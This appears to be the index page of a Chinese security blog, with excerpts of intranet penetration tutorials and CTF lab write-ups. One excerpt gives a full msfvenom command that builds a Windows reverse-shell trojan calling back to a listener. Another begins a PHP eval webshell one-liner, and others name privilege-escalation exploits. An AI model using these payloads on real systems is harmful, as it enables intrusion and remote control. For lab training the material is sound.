刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

Defcon China 靶场题 - 内网渗透Writeup

对内网渗透的题目挺感兴趣的,所以做了一发。先给个拓扑图1. wordpresshttp://192.168.1.2/是一个wordpress文件上传: http://192.168.1.2/wp-content/uploads/后台可admin/admin登录ssh可root/admin登录2. word cve钓鱼从配置中看到有个文档web的配置http的log日志可以看到,也有一个bot每隔一段时间会去请求report.doc尝试用CVE-2017-11882打一波1、由于环境问题,先做s

CFS三层靶机搭建及其内网渗透附靶场环境

0x00 前言最近要参加的一场CTF线下赛采用了CFS靶场模式,听官方说CFS靶场就是三层靶机的内网渗透,通过一层一层的渗透,获取每个靶机的flag进行拿分,那么先自己搭建一个练练手吧,三层靶机的OVA文件下载地址可以在我的公众号“TeamsSix”回复“CFS”以获取。在这三台主机中,每台我都放了多个flag,本文将只讲述每个靶机的攻击过程,对于flag的获取不做讨论,这点需要读者自己动手找到这些flag,如果你想知道自己找到的flag是否正确且齐全,同样可以在我的公众号“TeamsSix”回

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。 网络拓扑 环境搭建首先在虚拟机中新建3块网卡,选择仅主机模式将kali设为第一层网络vmnet1将第一层靶机设为双网卡vmnet1和vmnet2将第二层靶机设置为双网卡:vmne

MSF学习-端口转发代理及路由功能-三层内网靶场渗透

MSF学习-端口转发代理及路由功能-三层内网靶场渗透前言其实是受这篇文章影响-三层网络靶场搭建&MSF内网渗透一般实战和CTF中经常会碰到多重内网的问题,要想渗透多重内网,经常会用到msf的转发代理路由功能,所以受上面文章影响,我准备自己搭一个简易的三层内网,然后利用msf的这些功能进行一次小型模拟多重内网的渗透前期准备系统:Kali Linux (攻击机)Windows 7 (靶机1)Windows 2003(靶机2)Windows 10(靶机3)网络拓扑:Kali Linux Win

史上最强内网渗透知识点总结

获取 webshell 进内网测试主站,搜 wooyun 历史洞未发现历史洞,github, svn, 目录扫描未发现敏感信息, 无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用 ocr 识别,找账号,通过 google,baidu,bing 等搜索,相关邮箱,域名等加常用密码组成字典,发现用户手册,找账号,发现未打码信息,和默认密码,试下登陆成功,找后台,上传有 dog,用含有一句话的 txt 文件 `<?php eval($_POST['cmd

内网渗透基础介绍 - 第二天(内网渗透基础操作、代理隧道与C&C建立)

内网渗透基础操作:1.常用基本渗透工具准备   内网渗透之端口转发与代理工具总结2.非域环境基础介绍代理隧道与C&C建立一、C&C通信  这里的C&C服务器指的是Command & Control Server--命令和控制服务器,说白了就是被控主机的遥控端。一般C&C节点分为两种,C&C Server 和 C&C Client。Server就是就是黑客手里的遥控器。Client就是被控制的电脑,也就是受害者。C&

内网渗透基础介绍 - 第一天(域环境基础介绍,搭建本地测试基础多域林环境)

(该文参考整理自网上文章,相关链接附于文末)域工作组(Work Group)工作组是局域网中的一个概念,由许多在同一物理地点,而且被相同的局域网连接起来的用户组成的小组,也可以是遍布一个机构的,但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,加入工作组是为了区分用户计算机在网络中的类别,如果用户有工作组的话,在管理上会方便很多,可以共享/使用打印机和协和工作,很多小企业都是用这种方法来管理电脑,共享文件。工作组环境中的登

Meterpreter提权详解

0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为4444,

Meterpreter命令详解

0x01初识Meterpreter1.1.什么是Meterpreter  Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远

内网渗透之横向渗透

前言在一次测试中发现某系统存在SQL注入漏洞。且IIS可暴露绝对路径。使用--os-shell命令,填写绝对路径可执行系统命令。提权sqlmap在执行--os-shellI命令时向服务器写入了上传文件的脚本。通过文件上传可直接上传大马。简单执行几条系统命令查看该服务器基本情况。权限不够,上传cve-2018-8120.exe进行提权。cve-2018-8120.exe  "whoami"cve-2018-8120.exe  "

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.